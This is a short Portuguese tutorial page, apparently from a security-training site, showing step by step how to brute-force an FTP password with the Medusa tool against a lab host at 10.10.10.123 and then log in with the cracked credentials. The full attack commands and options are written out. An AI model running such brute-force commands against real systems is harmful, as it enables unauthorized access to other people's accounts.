Medusa é uma ferramenta de brute force para a realização de ataques remotos, possui diversos módulos para realizar ataques.

Site: foofus.net

01 - Passo

Listar módulos disponíveis para ataque, neste exemplo iremos utilizar o módulo FTP.

medusa : Ferramenta.
-q : Lista os módulos disponíveis.

Linux
medusa -q | more

02 - Passo

Crie o arquivo senhas.txt contendo possíveis senhas.

Linux
cat senhas.txt

03 - Passo

Realizando o ataque, como segue abaixo a senha do usuário 100security foi revelada : 123456.

-h : Define o host alvo.
-u : Define o usuário a ser atacado.
-P : Define o arquivo Wordlist.
-M : Define o módulo.

Linux
medusa -h 10.10.10.123 -u 100security -P senhas.txt -M ftp

04 - Passo

Acesso ao ftp com o usuário 100security e senha 123456.

Linux
ftp 10.10.10.123


  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2020 - 100SECURITY

Contato